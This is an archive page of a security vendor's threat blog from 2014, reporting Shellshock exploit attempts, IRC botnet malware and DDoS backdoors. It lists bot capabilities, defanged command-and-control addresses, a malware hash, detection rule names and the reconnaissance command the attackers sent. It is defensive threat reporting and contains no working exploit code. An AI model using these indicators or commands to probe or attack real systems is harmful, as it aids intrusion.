Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    November 2014
    S M T W T F S
    « Oct    
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    30  
  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Author Archive - Trend Micro




    Our coverage on the Bash bug vulnerability (more popularly known as “Shellshock”) continues as we spot new developments on Shellshock-related threats and attacks.

    Here is a list of our stories related to this threat:

     
    Posted in Malware, Vulnerabilities |


    Sep28
    6:27 am (UTC-7)   |    by

    It seems like the floodgates have truly opened for Shellshock-related attacks. We have reported on different attacks leveraging the Bash bug vulnerability, ranging from botnet attacks to IRC bots.

    We have also mentioned that we spotted Shellshock exploit attempts in Brazil. It appears that these attempts were not limited to that country alone. We saw yet another Shellshock exploit attackthis time targeting a financial institution in China.

    Trend Micro Deep Discovery was able to detect this attempt and found that attackers were trying to see if several IPs owned by the institution were vulnerable to a Shellshock vulnerability, specifically CVE-2014-06271. Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to the use the command “/bin/uname –a.” The command “uname” displays system information, including the OS platform, the machine type, and the processor information.

    At first glance, retrieving system information might seem harmless. But as we mentioned before, the information-gathering could possibly be a sign of preparation for more damaging routines. This one command could be a gateway for bigger, more damaging attacks.

    The timing of the attempts is quite interesting, given that Golden Week celebrations in China begin on October 1st. It’s very plausible that this attempt could be the initial phase of an attack that may occur during this holiday, as network administrators will be on leave at this time.

    Trend Micro continuously monitors attacks that may leverage the Bash vulnerability, while securing users and organizations from such real world threats. Trend Micro Deep Discovery provides network-wide visibility and intelligence to detect and respond to targeted attacks and advanced threats.

    Users are protected from this threat via our Smart Protection Network that detects the malware and blocks all related malicious URLs. Exploits abusing the Bash vulnerability, on the other hand, are detected via the following solutions:

    • Deep Discovery rule: 1618 – Shellshock HTTP REQUEST
    • DPI rule: 1006256 – GNU Bash Remote Code Execution Vulnerability
    • CVE-2014-6271-SHELLSHOCK_REQUEST detection

    Other users who may want to check if they are affected should check our free protection for Shellshock. We’ve also released browser extension and device scanners to protect users’ browsers and devices against the risks posed by Bash bug vulnerability. These tools can scan devices to detect if has been affected by the bug.

    For more information on the Bash bug vulnerability, you may read our other articles:

    Users can also check out our online article, About the Shellshock Vulnerability: The Basics of the “Bash Bug”, for a quick and easy summary of what Shellshock actually is and why it’s such a big deal.

     



    Given the severity of the Bash vulnerability, also known as Shellshock, it is no wonder that we’re seeing a lot of attacks leveraging this. Just hours after this vulnerability was reported, malware payload such as ELF_BASHLITE.A emerged in the threat landscape. Other payload like PERL_SHELLBOT.WZ and ELF_BASHLET.A were also spotted in the wild, which have capabilities to execute commands, thus can compromise a system or a server.

    Apart from these malware payloads, DDoS attacks against well-known organizations have been reported. During the course of our investigation, we spotted exploit attempts in Brazil that test if the target server is vulnerable. This means that attackers behind such attempts are probably gathering intelligence. Once they get the information they need, they can possibly launch succeeding attacks, and consequently, infiltrate their target network.

    Our researchers are continuously monitoring possible attacks that may employ Shellshock. In the course of our investigation, we spotted an active IRC bot (Internet relay chat) that leveraged the Bash vulnerability. Trend Micro detects this bot as PERL_SHELLBOT.CE. Infected systems will connect to an IRC server, us[dot]bot[dot]nu via port 5190 and join the IRC channel, #bash. It will then wait for commands from a remote attacker.  We analyzed the code and found out that it has the capability to launch the following commands:

    • Perform DDoS attacks
      1. UDP
      2. TCP
      3. HTTP
    • IRC Booting/Disconnecting through CTCP, Message, Notice Flooding
    • Download Arbitrary File
    • Connect to Server (IP:Port)
    • Scan opened ports (<ip>)
    • Send E-mails (<subject>, <sender>, <recipient> <message>)
    • Ping IP (<ip>,<port>)
    • Resolve DNS <ip/host>
    • Check Bot Configuration

     

    day-3-bash-infect-diagram

    Figure 1. PERL_SHELLBOT.CE infection diagram

    So far, we have witnessed this bot launch the command to change channel. This is probably done as a form of evasive technique to prevent being taken down. As of posting, we have seen more than 400 active bots join the IRC channel. We found that most of those who accessed the IRC server are located in the U.S., Japan, Canada, and Australia.

    The threats and attack attempts, and now the emergence of a live IRC bot clearly shows the severity of this vulnerability and its real world impact to users and enterprises. We will remain vigilant and be on the lookout for other attacks and threats. Stay tuned as we update this blog for new developments.

    For more information on Bash vulnerability, read our previous articles:

    With additional analysis from Alvin Bacani, Karla Agregado, and Mark Manahan. 

     
    Posted in Malware, Vulnerabilities | Comments Off



    We have another update regarding Shellshock vulnerability. In a previous blog entry, we mentioned about a DDoS attack against institutions that depicted the gravity of the vulnerability’s real-world impact.

    Based on our analysis, the backdoor that was used in this DDoS attack is somewhat related to the previous Shellshock exploits we have seen. It appears that the various payloads (PERL_SHELLBOT.WZ, ELF_BASHLITE.A, ELF_BASHLET.A) in the exploit code of the Shellshock vulnerability connect to several, yet common C&C servers. Analyzing these servers, we managed to uncover yet more details on just how far-reaching this particular vulnerability is.

    For those joining the fray just now, Shellshock is a vulnerability in the Bash shell, a user interface that allows users to access an operating system’s services through typewritten commands. In the wrong hands, an attacker can use Shellshock to run malicious scripts in online systems and servers, compromising anything and everything in and connected to those elements. And make no mistake, this particular vulnerability has a lot of potential for widespread damage, as it’s seen to affect systems operating on Linux, BSD, and Mac OS X.

    Analyzing one of the C&C servers involved 89[dot]238[dot]150[dot]154[colon]5  — related to ELF_BASHLITE.SM and ELF_BASHLITE.A. We discovered that it is also used by ELF_BASHWOOP.A, yet another malware that we have discovered to be involved in the attacks. ELF_BASHWOOP.A is the backdoor used in botnet attacks against well-known organizations.  The only difference is the port it connects to: ELF_BASHWOOP.A connects to port 9003, while ELF_BASHLITE.SM connects to port 5. Based on our findings, this particular C&C server is located in Great Britain.

    Another C&C server we analyzed, 162[dot]253[dot]66[dot]76[colon]53, is used by both ELF_BASHLITE.A and ELF_BASHLITE.SM. Our findings confirm that this C&C server is located in the United States.

    Below is the list of countries that accessed these C&C servers:

    Shellshock-Map

    CandCservers

    Figures 1 & 2. Map and Table of C&C Servers

    Note that the commands these malware can execute pertain to the control and termination of botnets, as well as executing distributed denial of service (DDoS attacks).  We also found that they could flood IRC users with long messages on command, which could result in them being disconnected. Some command examples include UDP and TCP flooding, terminating attack threads and botnets, and so on.

    It should be stressed that the Shellshock vulnerability does not only affect servers and computers. We’ve been doing some testing on our own, and we confirm that the following are vulnerable to Shellshock:

    • Linux-based devices
    • Mac OS X devices
    • iPhone

    We must issue a caveat here, however. While we confirm the latter two to be vulnerable, it’s only Linux-based devices that can be attacked remotely – Mac OS X devices and iPhones can only be attacked at a local level, i.e., the attacker has physical access to the device itself. Apple’s statement about this matter, where it declares that OS X users are safe from Shellshock if they have not configured their devices for advanced UNIX services, still hold true.

    Shellshock exploit attempts in Brazil

    We have also begun to spot Shellshock exploit attempts in Brazil, which seems to be targeting government institutions.  Trend Micro Deep Discovery is able to detect the intrusion:

    threatgeographicmap

    Figure 3. Trend Micro Deep Discovery discovers Shellshock attempt in Brazil

    It does not seem to have any real payload or do any real damage, but takes what appears to be information about the systems it’s trying to infiltrate. But in the world of cybercrime and cyber attacks, that may change soon enough. We believe that the information-gathering could be a sign of preparation for a bigger, much more damaging attack.

    Trend Micro continuously monitors attacks that may leverage the Bash vulnerability, while securing users and organizations from such real world threats. Trend Micro Deep Discovery provides network-wide visibility and intelligence to detect and respond to targeted attacks and advanced threats.

    Readers of the Security Intelligence Blog can rest assured that we will continue to cover this threat and provide timely updates as we get them.

    For more information regarding Shellshock, you can check out our previous articles:

    Users can also check out our online article, About the Shellshock Vulnerability: The Basics of the “Bash Bug”, for a quick and easy summary of just what Shellshock actually is, and why it’s such a big deal.

     
    Posted in Exploits, Malware, Vulnerabilities | Comments Off


    Sep26
    2:01 pm (UTC-7)   |    by

    One of the implications of the Bash Bug vulnerability also referred to as Shellshock is that cybercriminals and attackers can use it to launch DDoS attacks against enterprises and large organizations. True enough, there are reports already mentioning that there are botnet attacks against certain institutions which employed the vulnerability. A botnet is a network of infected computers/systems.

    Based on our investigation, the backdoor (which Trend Micro detects as ELF_BASHWOOP.A) launches the following commands:

    • kill
    • udp
    • syn
    • tcpamp
    • dildos
    • http
    • mineloris

    In addition, it connects to the C&C server, 89[DOT]238[DOT]150[DOT]154 to receive commands. Note that this is the same C&C that ELF_BASHLITE.A — the malware we initially saw as the payload of the Bash exploit .The related hash for the said threat is 96498e53200cfb3947cbd5357f6833a1d0605360.

    Earlier, we spotted several malware payload of the exploit code of bash vulnerability, which Trend Micro detects as:

    Users are protected from this threat via its Smart Protection Network that detects the malware and blocks all related malicious URLs. For the Bash bug vulnerability, Trend Micro protects via the following solutions:

    • Deep Discovery rule: 1618 – Shellshock HTTP REQUEST
    • DPI rule: 1006256 – GNU Bash Remote Code Execution Vulnerability

    For more information on the Bash bug vulnerability, you can refer to the following blog entries:

    Users can also read our article, About the Shellshock Vulnerability: The Basics of the “Bash Bug” for details on the vulnerability and the risks it posed to users and organizations.

    We’ll continuously update this blog entry for new findings.

     
    Posted in Exploits, Malware, Vulnerabilities | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice